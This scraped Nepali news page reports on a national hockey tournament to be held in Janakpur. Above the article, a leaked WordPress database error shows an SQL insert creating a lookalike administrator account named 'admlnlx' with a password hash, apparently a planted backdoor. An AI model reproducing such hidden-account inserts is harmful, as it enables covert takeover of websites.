WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bp02gKEXGXManUlTVJHDNzAeb2pLl80', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 05:02:39', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
राष्ट्रिय हक्की प्रतियोगिता जनकपुरमा हुने – Gaule Khabar

राष्ट्रिय हक्की प्रतियोगिता जनकपुरमा हुने

राष्ट्रिय हक्की प्रतियोगिता जनकपुरमा हुने

धनुषा,माघ ४ –

सत्राँै राष्ट्रिय पुरुष तथा दोस्रो राष्ट्रिय महिला हक्की प्रतियोगिता जनकपुरमा हुने भएको छ ।

नेपाल हक्की सङ्घ तथा अन्य सङ्घ संस्थाको सहयोगमा आउँदो चैत १४ देखि १९ गतेसम्म जनकपुरको रङ्गभूमि मैदान बाह्रबिगाहामा प्रतियोगिता हुने जनाइएको छ ।

मङ्गलबार बिहान रिपोर्टस् क्लब जनकपुरमा भएको पत्रकार सम्मेलनमा धनुषा हक्की सङ्घको उपाध्यक्ष अमित झाले प्रतियोगितामा पुरुष तर्फ नेपालको पाँच विकास क्षेत्रका पाँचवटा टोली र नेपाली सेनाको टोली गरी ६ वटा टोली तथा महिलातर्फ चारवटा क्षेत्रीय टोली र नेपाली सेनाको महिला टोली गरी पाँचवटा टोलीको सहभागिता रहने जानकारी दिनुभयो ।
स्थानीयस्तरमा धनुुषामा यसअघि चारवटा हक्कीे प्रतियोगिता भइसकेका छन् । तर यसपालि राष्ट्रिय स्तरमा पहिलो पटक प्रतियोगिता हुन गइरहेको छ । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका